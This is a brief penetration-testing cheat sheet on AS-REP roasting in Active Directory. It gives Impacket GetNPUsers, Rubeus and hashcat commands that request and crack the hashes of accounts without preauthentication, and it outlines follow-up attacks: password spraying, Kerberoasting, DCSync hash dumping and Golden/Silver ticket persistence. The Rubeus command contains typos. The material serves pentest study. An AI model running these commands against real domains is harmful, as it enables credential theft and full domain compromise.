Skip to main content

AS-REP Roasting

About The Attack

AD has a user attribute Do not require Kerberos preauthentication (DONT_REQ_PREAUTH) , if this is enabled AD does not validate the encrypted timestamp and skips the preauthentication, and sends AS-REP to the request, The TGT (AS-REP response) is encrypted with the user’s NTLM hash (derived from their password). Since an attacker can get this encrypted blob without authentication, it can be brute-forced offline.

Performing Attack

Gear Up (Prereqs)

  • Domain Controllers IP
  • User:Pass for authentication

Using Impacket-GetNPUsers

This command will be used when launching the attack from the kali linux machine

impacket-GetNPUsers -dc-ip <DC-IP> -request -outputfile hashes.asreproast domain.com/user
info

user is the username which you have credential to, For this attack you have 2 options either you can pass the list of user name -usersfile users.txt for which you want to perform the AS-REP Roast or the above method in which Impacket-GetNPUsers enumerate users after authentication.

Using Rubeus

This command will be used when you have a windows machine in the domain

rubeus.exe asreprost /nowwrap

Crack the Collected Hash

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

We can also use custom rule or any other suitable wordlist.

Further Actions

Below are some of the use cases after successful caracking of the hash

Credential Reuse

  1. Password Spraying --> SMB/RDP/WinRM
  2. LDAP/Kerberos --> Enumerate Further
  3. VPN/Outlook web Access/ Citrix

Privilege Escalation

If the account belongs to :

  1. Domain Admins / Server Operators / Account Operators → instant escalation.
  2. Service Accounts (common) → pivoting into Kerberoasting, Silver Tickets, or lateral movement.
  3. Users with local admin rights → move laterally via SMB/PSExec/WinRM.

Chaining with Other Attacks

  1. From AS-REP → Kerberoasting.

If the account cracked has SPNs, request service tickets and roast them.

  1. From AS-REP → DCSync.

If the cracked account has replication privileges, dump all domain hashes.

  1. From AS-REP → Persistence.

If it’s a privileged service account, create Golden/Silver Tickets for long-term persistence.